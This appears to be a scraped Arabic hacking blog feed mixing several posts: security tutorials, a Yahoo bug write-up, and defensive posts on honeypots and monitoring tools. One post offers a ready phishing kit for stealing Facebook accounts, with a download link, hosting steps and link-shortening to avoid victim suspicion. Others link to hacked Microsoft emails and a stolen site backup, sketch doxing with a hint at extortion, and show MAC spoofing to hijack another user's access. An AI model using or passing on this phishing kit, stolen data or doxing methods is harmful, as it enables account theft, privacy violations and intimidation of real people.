شرح إستخدام أداة medusa في إختراق نظام CentOS

في هذا الفيديو شرح أداة medusa وأهم الخصائص الموجوده فيها لعمل هجوم تخمين أو ما يعرف ب “Brute Force Attack ” , وإختراق نظام CentOS من خلال خدمة SSH , طبعاً برنامج medusa يحتوي على العديد من الخيارات القويةالتي بإذن الله سوف نتكلم عنها في دروس أخرى إن شاء الله.

http://video.r00tnetwork.org/2014/06/medusa-centos.html

Follow @KAMINDOZ Tweet

تعرف على ثغرة مسح التعليقات فى موقع Yahoo

السلام عليكم
نستعرض اليوم write-up لأحد الثغرات فى موقع الياهو -والتى تم اصلاحها ولكن ننشرها لزيادة الخبرة العملية لمختبرى الإختراق والباحثين الأمنيين-  ثم نتعرف على مكتشفها.
الثغرة تقوم بمسح التعليقات فى موقع الياهو والتى تؤثر على عدة خدمات مختلفة مثل Yahoo News , Yahoo Sports , Yahoo TV , Yahoo Music , Yahoo Weather, Yahoo Celebrity , Yahoo Voices .
يمكن تصنيف الثغرة على انها paramter pollution
تبدأ عملية اكتشاف الثغرة من موقع tv.yahoo.com والذى يوفر خاصية التعليق على المقالات وايضا يسمح لصاحب التعليق بحذف تعليقه .
فى البداية نضيف اى تعليق على احد المقالات ثم بعد ذلك نحذف التعليق ونقطع http request من خلال اى بروكسى “intercepting proxy” نجد ان http request هو من نوع post والرابط هو https://tv.yahoo.com/_xhr/contentcomments/delete_comment/ والبارمترز :
comment_id=1399678299182-a7043814-9858-482a-87cd-3448b0892cdd&content_id=485d5605-df95-3569-9456-33882964aea9&crumb=DcUNKWnp7%2F8
قيمة comment_id هى رقم التعليق الخاص بنا والسؤال الأن هل يتم التحقق جيدا من قيمة هذا البارمتر ام نستطيع التلاعب بالقيمة ؟
للإجابة على هذا السؤال نفتح متصفح اخر “كروم” وندخل من حساب ياهو اخر ثم نكتب تعليقا على نفس الموضوع ونعود مرة اخرة الى المتصفح الأصلى “فايرفوكس” ونعطى تقييما لهذا التعليق الجديد ونقطع الطلب الخاص بالتقييم من خلال بروكسى ثم ننسخ قيمة comment_id لحساب الياهو  الأخر .
نعود الى الطلب الأول الخاص بمسح التعليق ونستبدل قيمة comment_id بالقيمة الجديدة الخاص بحساب الياهو الأخر والنتيجة كانت:



تم مسح التعليق بنجاح .
تم ابلاغ فريق الحماية فى موقع ياهو بالثغرة على الفور ولكن ردهم كان مخيبا للأمال

فالثغرة لا تعمل .فلنحاول استغلال الثغرة مرة اخرى ولكن لا فائدة الثغرة لا تعمل وهذه النتيجة اذا حاولنا الإستغلال على مقال جديد

لا تمتلك صلاحيات للتعديل على هذا التعليق !!
ماذا يحدث ؟ هل تم اصلاح الثغرة ؟!! ام هناك خطأ ما فى الإستغلال !!! لا مانع من محاولة استغلال الثغرة على المقال القديم والنتيجة تم مسح التعليق بنجاح !!
شىء محير الثغرة تعمل على مقال وتفشل فى مقال اخر .بعد البحث اكثر واكثر توصلنا للسبب : الثغرة تعمل فقط اذا كنت انت صاحب اول تعليق على الموضوع وبذلك لك الصلاحيات لمسح اى تعليق بعد تعليقك !!
تم ارسال الثغرة مرة اخرى بهذه التفاصيل الجديدة والحمد لله قام فريق الحماية فى  الياهو بإصلاح الثغرة  .
مكتشف هذه الثغرة هو احمد ابو العلا : باحث امنى مصرى ومختبر اختراق للمواقع والشبكات ومكتشف ثغرات فى عدد من المواقع الكبرى مثل جوجل وميكروسوفت.

Follow @KAMINDOZ Tweet

سكامة للاسبام

لمحبين قنص حسابات الفيسبوك سكامة طازجة و التبليغ تكست

تقولي في مواقع تصنعلك و انت مرتاح

حبيبي كلها نصب و احتيال

ندخل في الموضوع

هذي هي السكامة

telecharger

كود:

http://www.mediafire.com/?0t9kckknxmxemve

و هذي ثلاث ملفات



نشرحهم


هذي الصفحة المزورة



هذا كود php



ملف تكست يوصلك عليه التبليغ



نرفعهم على اسنضافه مجانية تدعم دالة fopen 
ويجب تصريح الملف الذي بداخله الصفحه المزوه والملفات المرفقه بتصريح 777 ليسمح بكتابة التبليع في ملف txt


وبعد ذلك ادخل بحسابك

و ارفع ثلاث ملفات

و مبروك عليك الصفحة

تقولي الرابط طويل ممكن الضحية يشك اقلك

اسم الموقع
TinyURL

عنوان الموقع

كود:

http://tinyurl.com/

ثم اضغط زر Make TinyURL

سوف تحصل على رابط قصير يوجهك الى نفس الموقع اذا تم الضغط عليه

Follow @KAMINDOZ Tweet

وثائق تجسس مايكروسوفت: يرجى قرائتها قبل استخدام اي خدمة تابعة للمايكروسوفت

ينشر اليوم الجيش السوري الإلكتروني الوثائق المسربة من مايكروسوفت بعد ان اختراق

الجيش السوري الإلكتروني عدد من حسابات البريد الإلكتروني التابعة للشركة

ويرجى الإطلاع على الوثائق قبل استخدام اي خدمة من خدمات مايكروسوفت من (اوت لوك, سكايب, وغيرها)

رابط الفواتير من مايكروسوفت لمكتب التحقيقات الفدرالي(FBI):

http://www.scribd.com/collections/4467921/FBI-DITU-Invoices-to-Microsoft

بعض اللقطات من حسابات البريد الإلكتروني:

الوثائق في الإعلام:

عالم التقنية

http://www.sea.sy/article/id/2034/ar

Follow @KAMINDOZ Tweet

التحليل الجنائي لاجهزة الاندرويد

سم الله الرحمن الرحيم
والسلام عليكم ورحمة الله وبركاته جميعاً

شرح اليوم سوف يكون عن طرق التحليل الجنائي لاجهزة الاندرويد
طبعاً شرحي يتكون من 10% من التحليل الجنائي لاجهزة الاندرويد ، حيث سوف نقوم بمحاولة استخراج باسوورد والايميل لبرنامج معين مثبت مسبقاً على الجوال ،  أردت ان يكون خفيف وسريع وان شاء الله الجميع يستفيد
# ما نحتاج اليه في هذا الشرح :
1.جهاز اندرويد ، ويفضل ان يكون حاصل على صلاحيات الروت
2. نظام Kali Linux
3.تثبيت Android SDK

في بادئ الامر ، نقوم بوضع الجوال على وضعيه USB DEBUGGING ، ومن ثم نقوم بأيصاله USB

بعد ذلك نقوم بفتح تيرمنال ونقوم بالذهاب للمسار الاتي :





ولنتأكد من الاجهزه الموصوله بالنظام نقوم بكتابه ,
./adb devices
لننتقل الى المرحلة التاليه وهي ، الحصول على shell ، من خلال كتابة الامر
./adb shell ، والحصول على صلاحية روت بكتابة su root


حصلنا على شل روت ، قبل ان نكمل العملية يجب ان نتعرف على نظام الملفات الموجود في الاندرويد



طبعاً الصوره واضحه جداً وما يهمنا هو مجلدين [ Shared_prefs & database ]
نقوم بالذهاب الى مجلد الذي يتواجد فيه البرامج المثبته على الجوال ، ونستعرض المجلدات بالامر ls





على سبيل المثال سوف اقوم بالدخول الى مجلد برنامج KIK الشهير





ومن ثم Shared_prefs









نقوم باستعراض الملفات المتواجده في المجلد [ ls ] ، وقراءة الملفات الموجوده بالامر cat
فيكون الناتج كالتالي /


كما هو واضح لكم ، اسم المستخدم ، والايميل ، والباسوورد المشفر …الخ

ولو اردت استعراض قواعد البيانات المتواجد لكل برنامج


نسحب قاعدة البيانات للنظام ونستخدم اداة Sqlite3
والاوامر المستخدمه في استعراض قواعد البيانات من خلالها





والسلام عليكم ورحمة الله وبركاته

Follow @KAMINDOZ Tweet

افضل 100 اداة حماية مجانية مفتوحة المصدر

هذه اهم برامج او ادوات الحماية المجانية مفتوحة المصدر وقد تم عمل اختبارات أمنية بناء على ستة مفاهيم اساسية و هي :
السرية والنزاهة، والتوثيق ، إذن، وتوافر، وعدم التنصل.
والبرامج ترتيبا بالافضل كالتالي:

• Aircrack
• AirSnort
• Angry IP Scanner
• Audit Record Generation and Utilization System (Argus)
• Babel Enterprise
• Basic Analysis and Security Engine (BASE
• Bastille
• Brute Force Binary Tester (BFBTester)
• Burp Suite
• Cain & Abel
• Cheops-ng
• chkrootkit
• Clam AntiVirus (ClamAV
• Codenomicon Robust Open Source Software (CROSS)
• Dsniff
• EtherApe
• Ettercap
• Flawfinder
• fping
• fragroute
• Fragrouter
• Gendarme
• GnuPG
• Helix
• Honeyd
• Hping2
• ike-scan
• IP Filter
• John the Ripper
• Kismet
• Knoppix
• Libwhisker
• Metasploit
• Microsoft Baseline Security Analyzer (MBSA
• Nagios
• NBTscan
• Netfilter
• NetStumbler
• Nikto
• Ntop
• Oedipus
• OllyDbg
• OpenBSD
• OpenBSD Packet Filter (OpenBSD PF)
• OpenSSH
• Open Source Security Testing Methodology Manual (OSSTMM) 
• OSSEC HIDS
• Paros
• P0f
• PuTTY
• Root Kit Hunter
• Sam Spade
• Scapy
• Sguil
• Socat
• SPIKE Proxy
• Splunk
• Stunnel
• SuperScan
• Sysinternals
• Tcpdump
• THC Hydra
• Tor
• TrueCrypt
• Unicornscan
• WebScarab
• Wikto
• Wireshark
• Yersinia
• ZeroDayScan

طبعا البرامج هذه جميله وراائعه ويوجد غيرها لاكن هذه افضلها لحد الآن

Follow @KAMINDOZ Tweet

وعاء العسل : دور Honeypot بالإختراق

في سنة 1990 عرف عالم الإختراق ولادة تقنية جديدة تسمى وعاء العسل أو Honeypot  هذه التقنية كانت من إكتشاف Califrod Stoll الذي قام بعمل كتاب خاص بهذه التقنية وشرح فيه طرق إستغلالها إذا دعونا نتعرف على تقنية أخاخ وعاء العسل Honeypot.

Honeypot  هو عبارة عن أجهزة وهمية نقوم بعملها على شبكتنا المحلية من أجل عمل فخ للهاكر الذين يقمون بمهاجمتنا بطريقة سهلة بحيث عند إستهداف هذا الجهاز من طرف المخترق وأخد مايريده من بيانات مزيفة نقوم نحن بتتبعه ومعرفة طريقة تفكيره وماذا سيفعل بجهازنا وهذا ماقام بفعله مكتشف التقنية عندما إكتشف بأن جهازه تعرض للإختراق أراض معرفة طريقة إختراقه وماهي الأخطاء التي يمكن أن يقع بها مرة ثانية وطريقة تفكير المخترق بحيث قام بتتبعه وتحليل هجماته على الجهاز الوهمي .
يمكن إستخدام هذه التقنية في عدة أمور كالإطاحة بالمخترقين وإدانتهم قانونيا أو كذلك بالتحقيق الجنائي إلخ …
ويمكن كذلك بتقنية Honeypot   أن تساعد كل من يدير الشبكات بحماية الأجهزة المتصلة بالشبكة مثال على ذلك :
نقوم بعمل جهاز وهمي ونقوم بفتح منافذ وعدم حمايته سيقوم المخترق بفحص المنافذ المفتوحة أو حمايتك للجهاز وسيقوم بإختراقه بالفعل وهنا سيسقط بالفخ فعندها أنت ستتبعه وتعرف أين تكمن ضعف حمايتك للشبكة او النظام ومن خلاله ستقوم بعمل حماية جيدة وتصحيح الأخطاء الموجودة
وكما لايخفى علينا وللتوضيح فهنالك نوعين من Honeypot  :

1. low-interaction honeypots
2. high-interaction honeypots

low-interaction honeypots : هذا النوع من Honeypot يمنحنا بيئة داخل النظام ليقوم المخترق بالتفاعل معها كيف ذلك؟ عند وقوع المخترق بفخ Honeypot يجد نفسه داخل جهاز أو شبكة قام بإختراقها ولكنه ليس بكامل حريته أي لا يوجد لديه كافة الحرية للتحكم بكافة النظام الذي إخترقه وهنا يمكن للمخترق الذي يمتلك خبرة كبيرة بهذا المجال وعلى علم بالفخ أن يكشف المصيدة ويعرف بأنه وقع في فخ Honeypot ويمكن أن يقوم بعملية إنتقام من المخترق وهنا لايمكننا الجزم أو الحسم في طريقة رده ويمكن وقوع مشكلة فيجب الحيطة والإنتباه جيدا في وضع الطعم أي بالبيانات الحساسة التي نقوم بوضعها للمخترق.
High-Interaction Honeypots : هذا النوع من   Honeypot ليس كسابقه فأنت تصرح للمخترق بكافة التصاريح حيث تعطيه كافة الصلاحيات وكافة البيانات الحساسة كطعم وهذه الطريقة لايمكن إكتشافها إلى قليلا جدا من قبل المخترق ولكن تبقى خطورتها الاولى والأخيرة وهي عندما تتم عملية الإختراق لايمكن أن تجعلها فقط على الجهاز الوهمي بحيث يمكن للمخترق أن يقوم بإختراق كافة الأجهزة المتصلة مع الشبكة وبذلك ستقع أنت بالفخ وتطبق عليك مقولة من حفر حفرة لأخيه وقع بها .
مجال إختبار الإختراق والحماية تحتويه العديد من التقنيات وهذه بعض منها ويدعي للأمن وليس لإختراق الأشخاص وتطبيق عليهم الشروحات وتبقى تقنية Honeypot     من بين أهم الطرق لإصطياد الضحايا وإستدراجهم لإختراقك وللوصول إلى هدفك

Follow @KAMINDOZ Tweet

مصطلح Doxing

موضوعنا اليوم سيكون حول مفهوم Doxing سنقوم بمعرفة معناه والتقتنيات والأدوات المستعملة به وأيضا كيف نقوم بالحماية منه.
جلنا يعلم أن لكل شخص عدو أو ربما أعداء سواء كان هدا الشخص مشهورا عالميا أو تصفية حساب أو كان الشخص مجرد  مستهدف من قبل هاكر غير أخلاقي إدا يقوم المهاجم بجمع معلومات للكشف عن ضحيته والوصول إلى هدفه من هنا جاء مفهوم Doxing خصوصا عند الهاكر فهدا العالم يستوجب على الهاكر إخفاء نفسه ولا يترك أي أثر يكشف عن هويته مثلا نجد مشاكل بين هاكر وأخر ويقوم أحد منهم يكشف عن هوية الشخص فأنت بعالم الأنترنت تتعرف على الشخص فقط من الإسم المستعار الدي يطلق على نفسه وتتعامل معه من خلال الأنترنت ومن خلال إسمه المستعار فحين الكشف عليه ووضع كل مايخصه للناس يصبح هدا الشخص مستهدفا من قبل شرطة الأنترنت وهنا نتحدث فقط عن الهاكر الدين يقومون بعمليات إختراق الغير أخلاقية ليس مثل أطفال الهاكر من يجدون ثغرات جاهزة ويستخدمونها .
بطبيعة الحال يمكن إستخدام Dowing في إختبار إختراق أخلاقي والإستفادة منه وكدلك يستخدم في عمل تخريبي حيث أن رئيس أمريكا أوباما قد تم إستهدافه ب Doxing ومعرفة المواقع التي يزورها ومعرفة اسم الحساب الشخصي الخاص به وكذلك معرفة رقم الهاتف الشخصي الخاص به وهذا يثبت لنا فقط بأن Doxing يبقى أمرا خطيرا لدرجة كبيرة ويصعب الحماية منه.
تبقى طريقة توفرك على المعلومات الشخصية لهدفك مختلفة عند كل شخص فهنالك من سيقوم باستخدام محركات البحث مثلا ك Bing & Google & Yahoo الشهيرة والمعرفة وكذلك هناك من سيقوم بإستخدام برامج مثل Maltego وهنالك 
 أيضا مواقع تساعدك بهذه العملية حسب بلد الشخص المستهدف وهذه المواقع تسمى الصفحات الصفراء تقوم “Yellow page” حيث تقوم بكتابة إسم الضحية يعطيك العنوان ورقم الهاتف والعكس صحيح وتبقى هذه لمواقع خطيرة جدا حيث تكشف عن معلومات جد حساسة كذلك مثلا هدفك يتواجد ببلد غير بلدك لنقل مثلا بالمغرب فأنت ستقوم بالدخول إلى  موقع Yellow page الخاص بالهدف وتقوم بكتابة إسمه أو رقم هاتفه أو تقوم وتجد النتيجة أمامك .
هنالك أيضا طرق كثيرة تستخدم في Doxing فعند إمتلاكك لبريده الشخصي تقوم بمراسلته برسالة وعند رده عليك ستقوم بمعرفة IP الخاص به وهذا الأخير سيمكنك من معرفة مزود الخدمة الخاص به مكان إقامته ويمكنك أيضا أخد صور لمكان إقامته وإستفزازه بها وطلب المقابل لذلك لو كان هناك حساب ما “لا أشجع على تطبيق هده الطريقة”.
إذا هدا مايسمى Doxing تتبع أثار الأشخاص والتوفر على معلوماتهم الحساسة يبقى أمرا جد خطير فالنصيحة تكمن في عدم كتابة أي معلومات قد تنفع غيرك بإستخدامها ضدك خصوصا بالمواقع الإجتماعية تجنب عدم قبول صداقات أشخاص لا تعرفهم أو إعطاء معلومات لأي شخص مهما كان إستخدم برامج التشفير برسائلك وتجنب التسجيل بالمواقع المشبوهة والتي تقوم ببيع قاعدات البيانات الخاصة بها مقابل مبلغ مادي وهدا سيؤدي إلى معرفة الأرقام السرية للمسجلين بالموقع إذا يبقى الأمر عليك في طريقة إستخدامك ل موضوع Doxing أتمنى عدم تجربته على الأشخاص بطرق غير قانونية فنحن لا نشجع على دلك

Follow @KAMINDOZ Tweet

مقال : إختبار الإختراق خارج الشبكه بإستخدام مشروع Metasploit

من أكثر الأسئله التي كانت تأتي إلي هي “كيف أستطيع إختراق جهاز خارج الشبكه بإستخدام مشروع Metasploit” .. حسناً الأمر ليس بالأمر الصعب أو المستحيل بالعكس الأمر يحدث وبالفعل يمكنك إختراق الأهداف خارج الشبكه الداخلية بإستخدام مشروع Metasploit بكل سهوله ولكن دعونا نوضح بعض الأمور الخاصه بالمشروع وبعض التقنيات المستخدمه في الشبكات والتي تحدث وتمنع من حدوث هذا الأمر .
في البداية لنأتي لشرح عملية الإختراق بمشروع الميتاسبلويت سواء داخل الشبكه أم خارجها : -

1. الإختراق بإستخدام ثغرات Remote سواء كانت Buffer overflow Or Format string.
2. الإختراق بإستخدام ثغرات Local سواء كانت Buffer Or command execution
3. الإختراق بإستخدام ثغرات Client Side Attack ويكون الجزء الثاني فرع منها ولكن دعونا نوضح بعض الأمور ولماذا إعتمدت هذا التقسيم.

الأن النوع الأول هو أهم نوع وأكثر نوع يتم السؤال عنه .. في البداية هذا النوع من الثغرات يستخدم بشكل أكبر داخل الشبكات ﻷنه يتم إعتماد عنوان شبكه ثابت (ip) لكل الأجهزه مما يسهل عملية الإتصال بها ومن ثم إرسال أكواد الثغره وتنفيذها وإستقبالها أيضاً على جهاز المهاجم والذي أيضاً يمتلك IP ثابت مما يجعل الأمور تسير بشكل سليم من دون أي مشاكل .. الأن في حال إجراء محاولة لإختراق الأجهزه خارج الشبكه سوف يكون هنالك العديد من الأمور التي سوف تمنع الإتصال وأخرى سوف تسهل عملية الإتصال وتؤدي إلى الإستغلال بنجاح خارج الشبكه الداخلية .. لنبدء بالأمور التي تمنع الإستغلال مع شرحها :-

1. عدم وجود ip ثابت لجهاز الهدف.
2. عدم وجود ip ثابت لجهاز المهاجم.
3. وجود جدران نارية تمنع وصول الإتصال سواء من طرف المهاجم أم من مزودات الخدمه.
4. عدم توافق الإستغلال مع نوع وإصدار نظام التشغيل الخاص بالهدف.
5. وجود برامج مكافحة فايروسات على النظام مما يمنع تشغيل Payload.

في هذه الحالات السابقه لا يستطيع المهاجم إختبار إختراق الأجهزه خارج الشبكه ولهذه الأسباب لا يتم تنفيذ الثغرات وهذه المشاكل واجهتني أثناء بحثي عن الموضوع وهذا أيضاً ما أستنتجته من الخبرات التي أكتسبتها في الشبكات والبرمجه والأمور التي تختص بهذه المواضيع لذلك نأكد بضروره تعلم الشبكات وجميع الأمور المختصه بتقنية المعلومات لكي تبدع في مجال أمن المعلومات.
الأن لنأتي للنوع الثاني وهو الإختراق بإستخدام ثغرات Local والتي تكون تستهدف البرامج التي تستقبل إمتدادات معينه وهنا يكون دور المخترق بتجهيز بعض الثغرات بعد معرفة البرامج الموجوده لدى الهدف ومن ثم إستغلالها بإستخدام الهندسه الإجتماعية + Local Exploit .. هذه الطريقه لم تعد تجدي نفعاً وحالات الإختراق بها نادره بسبب وجوده مضادات للفايروس ومكافحات لمثل هذه الثغرات وتقنيات تحد من مثل هذه الثغرات لذلك شخصياً لا أحيذ التعامل مع هذه الثغرات لا من داخل الشبكه ولا من خارجها وأسباب فشلها خارجياً أيضاً نفس الأسباب التي تم ذكرها مسبقاً.
الأن لنأتي للنوع الثالث وهو الإختراق بإستخدام Client Side Attack وهي عملية إستغلال العميل والبرامج الموجود لديه لتنفيذ عملات الإختراق ولو نلاحظ أن النوع السابق يكون مشابه لهذا النوع ويكون فرع منه لأن هذا النوع يتفرع إلى عدة أقسام وهي :

1. Browsers Exploit وهذا النوع ينقسم إلى عدة أقسام وهي : 

Plugins exploit  :- وهو إستغلال الإضافات الموجوده على المتصفح في عملية الإختراق من خلال ثغرات تكون مصابه بها.
Java exploit :- سوف يسألني البعض أليس من نفس النوع الأول ؟ هي تشبهها ولكن جافا بحد ذاتها يحصل بها ثغرات وهنالك العديد من التثنيات أيضاً التي تمكن المستخدم من إختراق الجهاز الذي يعمل على Java من خلال Java applet مثلاً .
Main Browser exploit :- وهي عملية إستغلال نواه المتصفح بوجود ثغرات تؤدي إلى إختراق النظام.
2. Local exploit وهذا ما تكلمنا عنه سابقاً.
ممتاز بعد التعرف على هذه التقنية دعونا نتعرف أكثر عن كيفية إستغلالها خارج الشبكه وما هي العوامل المؤديه إلى نجاحها .
هذه العملية تعتمد على إقناع الهدف بفتح الرابط الذي سوف يتم إعداد الثغره عليه وهنا نأتي لتوضيح كيفية عمل الثغره والتي تعمل من خلال إنشاء صفحه مصابه بالثغره والتي تعمل على إستغلال الأخطاء الموجوده بالمتصفح أو الإضافات ومن ثم تشغيل وإطلاق Payload يعمل على الإتصال بالهدف وهذا أيضاً يعتمد على العوامل السابقه بالإضافه لعدة عوامل منها :-

1. إمكانية تحديد المواقع التي يتم الدخول إليها.
2. فشل الإتصال بالمستضيف للصفحه وهذا يعود لعدم وجود ip ثابت.
3. ترقيع المتصفح وإصلاح جميع الثغرات والاخطاء الموجوده فيه.

الحالات السابقه كما ذكرنا هي الحالات التي تمنع إستغلال مثل هذه الثغرات وتؤدي إلى فشل العملية.
أتمنى أن يكون الموضوع شامل لجميع الهجمات التي ممكن أن يستخدمها مختبر الإختراق للإختراق خارج الشبكه ومعرفة نقاط ضعفها وكيفية عملها.

Follow @KAMINDOZ Tweet

سحب باك اب موقع الهكر الوهابيه شفرات الابداع co0de.com من قبل منظمة قراصنة الشيعة

سحب باك اب موقع الهكر الوهابيه شفرات الابداع  co0de.com
من قبل منظمة قراصنة الشيعة


http://www.mediafire.com/?d11l0lge149ncl1

Follow @KAMINDOZ Tweet

Cain & Abel – Sniffer, Spoofer & Password Recovery Utility

يعتبر Cain & Abel من أقوى البرامج التي استخدمتها ومازلت أستخدمها في نظام ويندوز حتى هذا الوقت الاصدار الحالي من البرنامج 4.9.14 بالنسبة لي بدأت باستخدام هذا البرنامج من الاصدار 2.9.7 وبصراحة احترت كثيرا ماذا سأكتب بالعنوان! فللبرنامج الكثير من الوظائف المتنوعة, فهو Password Cracker و يعتبر من أقوى البرامج في نظام ويندوز لهذه المهمة هذا غير قدرته على استخراج جميع كلمات المرور المخزنة في الجهاز أما في مجال الشبكات فهو أسهل برنامج Spoofer رأيته بالاضافة لاحتواء البرنامج على Sniffer قادر على التقاط كلمات المرور من الشبكة والكثير الكثير من الأدوات والخيارات الأخرى…

الجدير معرفته أن برنامج Cain & Abel في المرتبة الأولى ضمن قائمة Top 10 Password Crackers و هو أقوى من برنامج John The Ripper الشهير! أما في قائمة Top 11 Packet Sniffers فقد تم تصنيفه في المرتبة الرابعة. البرنامج مقدم من oxid.it وهو في تطور سريع وفي كل مرة يضاف المزيد من الميزات له

صور لبرنامج Cain & Abel 4.9.14 وهو يعمل على جهازي

أتوقع أن الصور تظهر بعض من الميزات الموجودة في البرنامج وقدراته الكبيرة لكن طبعا هذا ليس كل شيء في البرنامج أما طريقة استخدامه فهي ليست معقدة ويوجد مع البرنامج كتاب مرفق يشرح كل شيء بالتفصيل وبالصور فأنا لن أستطيع شرح جميع خصائص البرنامج في موضوع واحد ولا ابالغ ان قلت أن كل خاصية تحتاج موضوع ولذلك كل شخص يعتمد على نفسه ويجرب خصائص البرنامج بنفسه ومع ذلك أظن أن الاطلاع على مقاطع الفيديو التالية من موقع Irongeek.com قد يكون مفيدا

Cain to ARP poison and sniff passwords | Sniffing VoIP Using Cain

شيء أخير يجب أن أقوله أنا بريئ من أي استخدام خاطئ للبرنامج وبالنسبة لأصحاب الشبكات الذي يسألون عن طرق حماية شبكاتهم من هذا البرنامج ومن برامج الـ Spoofing بشكل عام ان شاء الله سأضع موضوع قريبا يشرح ذلك بالتفصيل مع شرح طرق اكتشاف الأشخاص الذين يتجسسون على الشبكة و يستخدمون هذه الأنواع من البرامج!

موقع oxid.it | صفحة برنامج Cain & Abel | رابط التحميل | الكتاب المرفق

Follow @KAMINDOZ Tweet

شرح تغيير Mac Address كرت الشبكة و طرق معرفته بالتفصيل

أحد أهم الخطوات التي يجب القيام بها قبل القيام بأي محاولة فحص لشبكة ما أو اختراقها هي تغيير ماك أدرس كرت الشبكة الذي تستخدمه, لماذا؟ لأنه و بمنتهى السهولة أي مدير شبكة لديه خبرة بسيطة يستخدم برنامج/سيرفر ليراقب به شبكته سيعرف أنك تحاول اختراقها و بهذه الحالة الدليل الوحيد ضدك سيكون Mac Address كرت الشبكة الذي تستخدمه! و من الممكن أيضا أن نستفيد من أشياء أخرى كثيرة سأذكرها في الموضوع لكن قبل أن أكمل يجب أن تعلم أني أشرح هذا الموضوع لغرض التعلم فقط و لا أشجّع أحد على القيام بتجربة ما ذكر هنا دون موافقة مدير الشبكة أو خارج نطاق شبكته الخاصة!

أول شيء أتوقع أن يأتي شخص و يسأل ما هو الـ Mac Address ؟ الجواب: هو العنوان الفيزيائي لكرت الشبكة, كلمة Mac هي اختصار لـ Media Access Control و كل كرت شبكة يأتي بماك أدرس مختلف عن الآخر و لا يمكن وجود كرتين لهما نفس قيمة الماك أدرس و بشكل عام لا يمكننا تغيير القيمة الموجود بكرت الشبكة لأنها تحدد من أساس الصنع لكن يمكننا أن نقوم بتغييرها من النظام فعند بدء كل تشغيل يقوم النظام بنسخ قيمة الماك أدرس الحقيقي الى الرام و بهذه الحالة اذا أردنا تغيير الماك أدرس سنقوم بتغيير القيمة الموجودة بالرام فقط! و هذا يعني أن الماك أدرس سيتغير بشكل مؤقت و بعد اعادة تشغيل الجهاز ستعود قيمة الماك أدرس كما كانت و كأن شيء لم يكن, يتألف المك أدرس من 6 قيم HEX تكون فيها الأحرف من A – F أما الأرقام من 0 – 9 مثال على ذلك:

00-19-B9-52-C4-7C
00-15-C8-B6-52-6F
00-4F-C3-DA-3B-E5

لمعرفة الماك أدرس الخاص بكرت الشبكة لديك كل ما عليك هو تطبيق الأمر التالي في سطر الأوامر CMD بالنسبة لأنظمة Windows أو من خصائص الكرت نفسه (كل واحد يختار الأسهل له):

ipconfig /all

سيظهر لك هذا الأمر جميع معلومات كرت الشبكة من بينها الماك أدرس كما هو واضح في الصورة الموجودة في أعلى الموضوع

Physical Address. . . . . . . . . : 00-19-B9-52-C4-7C

أما اذا كان النظام الذي تستخدمه Linux فعليك تطبيق الأمر

ifconfig -a

ليظهر لك جميع كروت الشبكة الموجودة بالجهاز و معلومات أخرى كثيرة احداها الماك أدرس (المظلل) كما هو واضح في الصورة التالية:

و اذا أردت معرفة Mac Address جهاز موجود في نفس الشبكة يمكنك ذلك أيضا باستخدام احدى البرامج أو من الـ NetBios اذا كان نظامك Windows عن طريق تنفيذ الأمر التالي:

nbtstat -a IP-ADDRESS

مثال على ذلك

nbtstat -a 192.168.0.43

أما في نظام لينوكس يمكننا استخدام الأمر التالي:

nmblookup - A 192.168.0.43

أو حتى نفس الأمر السابق لكن بعد وجود سيرفر Samba منصب على الجهاز.

يوجد أدوات و طرق أخرى كثيرة لمعرفة الماك أدرس الخاص بالأجهزة الموجودة معك في الشبكة كاستعمال برنامج Sniffer مثلا لكني سأكتفي بهذا الحد و أترك معرفة باقي الطرق لكم, السؤال الذي يطرح نفسه الأن كيف يمكننا تغيير الماك أدرس؟ اذا كنا في نظام ويندوز يمكننا ذلك اما من الريجستري أو من الخصائص المتقدمة لكرت الشبكة (لا تدعمها جميع الكروت) كما في الصورة التالية:

أما أسهل طريقة هي استخدام برامج لتقوم لنا هذه المهمة, بالنسبة لي أجد برنامج TMAC 5.0 أفضلها و هو برنامج مجاني و بسيط يمكنك تحميله من هــنــا

كل ماعليك هنا هو تحديد كرت الشبكة الذي تريد تغيير الماك أدرس الخاص به و الضغط على زر Change.

أما في نظام لينوكس الأمر أسهل ما يكون و لا يحتاج لأي برنامج و يكفي تطبيق الأوامر التالية لتغيير الماك أدرس الخاص بالكرت الذي تريده:

ifconfig eth0 down hw ether 00:4F:C3:A4:3B:E5
ifconfig eth0 up

مع استبدال كل من eth0 باسم كرت الشبكة عندك و 00:4F:C3:A4:3B:E5 بالماك أدرس الذي تريد

الأن و بعد أن عرفنا كيفية تغيير Mac Address كرت الشبكة ماذا نستفيد من ذلك أيضا؟ الجواب: يمكننا عمل الكثير كأن نأخذ ماك أدرس جهاز آخر موجود على نفس الشبكة و بهذه الطريقة نستطيع أن نقطع اتصاله بالانترنت أو  قد نحصل على صلاحيته فمثلا بعض الشبكات تحدد سرعات تحميل مختلفة لكل جهاز اذا عرفت أي جهاز صاحب سرعة التحميل الأكبر غيّر ماك أدرس جهازك الى ماك أدرس جهازه و ستتمكن من التحميل بنفس السرعة المخصصة له! أيضا بعض شبكات الوايرس تعتمد على الماك أدرس و تحدد الأشخاص الذين يمكنهم الاتصال بالشبكة عن طريقه.. الكثير و الكثير الأشياء الأخرى لن أذكرها الأن بل أترككم لتكتشفوها بأنفسكم و بالنهاية أعيد و أكرر الموضوع للتعلم و الفائدة فقط! و ليس لتجريب ما ذكر فيه على شبكات عامة دون تصريح من مدير الشبكة أو خارج نطاق شبكتك الخاصة!

Follow @KAMINDOZ Tweet

برنامج Winpooch لمراقبة النظام , حمايته و معرفة أدق التفاصيل

كثيرا ما أجد أشخاص يشتكون من الفيروسات و برامج التجسس التي تصيب أجهزتهم و بصراحة أستغرب أكثر من الأشخاص الذي لا يعرفون ماذا يجري في نظامهم و لا يعرفون ماهي البرامج التي تعمل مع بدء التشغيل و أي منها يعدل على الريجستري أو يحاول الاتصال بالانترنت, مكافح الفيروسات لا يكفي مهما كان نوعه و تركيب عدة برامج لحماية الجهاز مثل جدار ناري و مراقب ريجستري و ملفات مع مضاد الفيروسات سيجعل الجهاز بطيء جدا و هذا أمر مزعج خصوصا في نظام ويندوز, لا أعلم لماذا يعتقد الأغلبية منا أن البرامج المشهورة هي الأفضل دائما مع العلم من وجود برامج أفضل, أخف على الجهاز, بسيطة و أكثر فعالية من غيرها أضف الى ذلك أنها مجانية و مفتوحة المصدر أيضا!

